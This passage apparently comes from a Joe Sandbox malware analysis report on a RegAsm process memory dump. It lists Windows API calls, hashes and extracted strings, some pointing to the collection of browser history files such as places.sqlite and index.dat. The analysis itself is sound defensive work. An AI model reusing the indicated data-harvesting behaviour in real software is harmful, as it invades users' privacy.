                      • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                      • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                      • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                      • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                      APIs
                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                      • String ID:
                      • API String ID: 1042154641-0
                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                      APIs
                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                      • memset.MSVCRT ref: 00414C87
                      • wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProcVersionmemsetwcscpy
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 4182280571-2036018995
                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                      APIs
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                      • memset.MSVCRT ref: 00403A55
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                      • String ID: history.dat$places.sqlite
                      • API String ID: 3093078384-467022611
                      • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                      • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                      APIs
                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                      • GetLastError.KERNEL32 ref: 00417627
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorLast$File$PointerRead
                      • String ID:
                      • API String ID: 839530781-0
                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID: *.*$index.dat
                      • API String ID: 1974802433-2863569691
                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@mallocmemcpy
                      • String ID:
                      • API String ID: 3831604043-0
                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • GetLastError.KERNEL32 ref: 004175A2
                      • GetLastError.KERNEL32 ref: 004175A8
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorLast$FilePointer
                      • String ID:
                      • API String ID: 1156039329-0
                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$ChangeCloseCreateFindNotificationTime
                      • String ID:
                      • API String ID: 1631957507-0
                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Temp$DirectoryFileNamePathWindows
                      • String ID:
                      • API String ID: 1125800050-0
                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                      APIs
                      Strings
                      • failed memory resize %u to %u bytes, xrefs: 00415358
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: realloc
                      • String ID: failed memory resize %u to %u bytes
                      • API String ID: 471065373-2134078882
                      • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                      • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                      • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                      • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: BINARY
                      • API String ID: 2221118986-907554435
                      • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                      • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                      • String ID:
                      • API String ID: 1161345128-0
                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /stext
                      • API String ID: 2081463915-3817206916
                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                      • String ID:
                      • API String ID: 159017214-0
                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                      APIs
                      Strings
                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID: failed to allocate %u bytes of memory
                      • API String ID: 2803490479-1168259600
                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcmpmemset
                      • String ID:
                      • API String ID: 1065087418-0
                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                      APIs
                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                      • String ID:
                      • API String ID: 1481295809-0
                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                      APIs
                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                      APIs
                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$PointerRead
                      • String ID:
                      • API String ID: 3154509469-0
                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                      APIs
                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itowmemset
                      • String ID:
                      • API String ID: 4232544981-0
                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
